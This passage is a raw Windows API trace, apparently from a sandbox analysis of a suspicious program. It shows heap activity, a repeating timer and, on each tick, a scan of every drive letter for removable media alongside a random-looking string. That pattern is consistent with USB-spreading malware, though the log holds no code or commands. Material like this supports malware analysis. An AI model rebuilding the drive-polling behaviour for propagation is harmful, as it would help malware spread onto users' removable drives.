RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0220.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0220.656] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0220.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0220.656] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0220.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0220.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0220.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0220.656] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0220.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0220.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0220.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0220.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.657] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0220.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0220.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0220.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.657] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.657] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.657] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.657] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.657] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.657] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.658] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.658] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.658] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.703] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.704] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.704] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.704] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.704] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.704] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.704] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.705] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.705] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.705] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.705] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.705] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.706] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.706] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.706] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.706] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.706] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.707] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0220.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0220.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0220.707] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0220.707] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.707] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0220.707] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.707] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.707] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0220.707] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0220.707] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0220.707] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0220.707] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0220.708] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0220.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0220.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260e0 [0220.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260e0 | out: hHeap=0x12c0000) returned 1 [0220.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0220.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0220.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0220.708] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0220.708] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0220.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0220.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.709] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.709] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0220.709] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0220.709] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.709] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0220.709] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.709] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0220.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0220.709] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.709] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0220.709] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0220.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0220.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.709] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0220.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0220.710] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.710] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0220.710] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.710] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0220.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0220.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0220.711] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.711] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.712] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.712] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.712] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.712] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.712] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.713] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.713] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.713] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.713] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.713] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.713] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.714] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.714] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.714] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.714] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.714] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.714] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.715] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.715] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.715] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.715] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.715] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.716] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.716] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.716] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.716] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0220.716] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.716] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.716] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.716] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.716] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.716] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.717] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.717] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0220.717] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.717] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.717] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.717] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.717] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0220.717] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0220.717] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0220.717] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260a0 [0220.717] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.717] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0220.717] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.717] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260a0 | out: hHeap=0x12c0000) returned 1 [0220.717] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.717] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0220.717] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0220.717] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.717] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0220.717] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.717] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.717] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.717] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0220.717] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.717] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.718] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.718] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.718] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.718] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.718] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.718] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0220.718] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0220.718] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.718] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0220.718] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0220.718] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.718] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0220.718] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0220.718] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0220.718] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0220.718] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.718] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0220.718] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0220.718] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.718] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0220.718] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.718] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.718] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.718] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.718] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0220.718] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0220.718] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.719] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.719] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.719] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.719] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.719] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.719] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.719] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.720] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.720] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.720] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.720] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.720] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.720] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.721] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.721] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.721] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.721] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.721] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.721] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.722] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.722] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.722] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.722] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.722] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.722] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.723] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.723] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.723] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.723] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.723] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.724] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.724] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0220.724] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0220.724] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0220.724] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.724] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0220.724] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.724] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.724] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.724] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0220.724] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0220.724] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0220.724] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0220.724] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0220.724] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.724] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0220.725] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.725] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0220.725] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325ea0 [0220.725] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325ea0 | out: hHeap=0x12c0000) returned 1 [0220.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0220.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0220.725] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0220.725] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0220.725] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, 